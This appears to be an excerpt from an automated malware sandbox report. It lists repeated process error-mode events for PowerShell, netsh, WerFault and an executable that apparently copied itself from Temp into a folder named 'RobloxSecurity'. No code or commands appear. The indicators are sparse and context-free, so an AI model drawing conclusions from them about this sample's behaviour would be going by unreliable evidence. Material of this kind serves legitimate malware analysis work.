Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
